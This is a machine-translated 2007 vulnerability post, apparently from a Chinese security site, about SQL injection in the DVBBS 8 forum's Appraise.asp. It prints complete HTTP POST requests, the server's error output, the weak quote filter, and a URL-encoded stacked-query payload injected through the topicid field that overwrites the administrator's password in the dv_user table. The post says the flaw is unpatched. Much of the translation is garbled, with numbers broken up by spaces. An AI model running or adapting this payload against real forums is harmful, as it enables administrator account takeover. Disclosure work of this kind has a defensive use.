Dvbbs8 serious vulnerability-vulnerability warning-the black bar safety net

2007-08-09T00:00:00
ID MYHACK58:62200716472
Type myhack58
Reporter 佚名
Modified 2007-08-09T00:00:00

Description

I here it has been assumed that a DVBBS8 SQL: We first register a user, just find a post. Just broke。。。。 We have to re-send a post. Discovery table review, where to capture

POST /dvbbs8/Appraise. asp? action=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=2&page=1 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; . NET CLR 1.1.4322) Host: 192.168.1.91 Content-Length: 9 1 Connection: Keep-Alive Cache-Control: no-cache Cookie: DvForum=UserID=3&usercookies=0&StatUserID=1 9 7 6 1 5 6 4 4&focus on your chosen=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765U6x7J5&userhidden=2; w0802=3; rtime=0; ltime=1 1 8 6 4 7 3 8 0 1 0 0 0; w08_eid=8 8 4 5 2 4 0 9-http%3A//192.168.1.91/dvbbs8/index. asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0

boardid=1&topicid=2&announceid=2&atype=0&a1=0&a2=0&atitle=1 1 1 1 1&acodestr=0 4 2 5&acontent=test

OK, LET's start LET's make fun userpost is the user published the post number. Wrong

script language='javascript'> <font face="Arial" size=2> p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> p> font face="Arial" size=2>line 1: ';' syntax error near from.& lt;/font> p> font face="Arial" size=2>/dvbbs8/inc/Dv_ClsMain. asp</font><font face="Arial" siz 2>, line 1 5 0 4</font>

The emergence of a This, don't tube he, in fact, we have been successfully modified! Article: 1 0 0 We continue to modify, in fact, is such, the program is a bit of a small problem we need to solve

TopicID = Dvbbs. CheckStr(Request. Form("topicid"))

Public Function Checkstr(Str) If Isnull(Str) Then CheckStr = "" Exit Function End If Str = Replace(Str,Chr(0),"") CheckStr = Replace(Str,"'",""") End Function

Obviously filter out single quotes。。。。 We so to spare Or modify the password, now the ADMIN password is admin888, we are to put him to modify into a 1 2 3 4 5 6[/code]declare @a sysname select @a=0x3400390062006100350039006100620062006500350036006500300035003700 update [dv_user] set userpassword=@a where userid=1[/code]this can modify the success of it!!! We put his change back

%3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1

OK, this statement can also be performed 1 5 6

POST /dvbbs8/Appraise. asp? action=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=3&page=1 Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; . NET CLR 1.1.4322) Host: 192.168.1.91 Content-Length: 2 4 2 Connection: Keep-Alive Cache-Control: no-cache Cookie: DvForum=UserID=3&usercookies=0&StatUserID=1 9 7 6 1 5 6 4 4&focus on your chosen=%C2%DB%CC%B3%D3%CE%C3%F1&username=allyesno&password=Y1tGx4j886XtB846&userhidden=2; List=list1=1; w0802=5; rtime=0; ltime=1 1 8 6 4 7 4 9 1 6 7 1 8; w08_eid=8 8 4 5 2 4 0 9-http%3A//192.168.1.91/dvbbs8/index. asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0

boardid=1&topicid=3%3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1&announceid=3&atype=0&a1=0&a2=0&atitle=2 2&acodestr=3 2 9 7&acontent=3 3

See, it has been modified into the 1 2 3 4 5 6

Because the vulnerability is more serious, please use caution, the official also unpatched!!!!!!